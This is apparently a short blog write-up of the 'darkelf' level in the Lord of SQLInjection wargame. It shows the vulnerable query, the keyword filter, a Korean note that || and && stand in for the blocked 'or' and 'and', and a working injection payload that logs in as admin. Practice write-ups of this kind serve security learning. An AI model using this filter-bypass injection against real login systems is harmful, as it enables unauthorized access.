Home [LOS] darkelf
Post
Cancel

[LOS] darkelf

Query

1
select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'


Protection

preg_match

  • prob 문자열
  • _
  • .
  • ()
  • or
  • and


Analysis

  • andor 연산자 대신 &&, ||를 사용할 수 있다


Payload

1
?pw=' || id='admin' %23
This post is licensed under CC BY 4.0 by the author.

[LOS] orc

[LOS] orge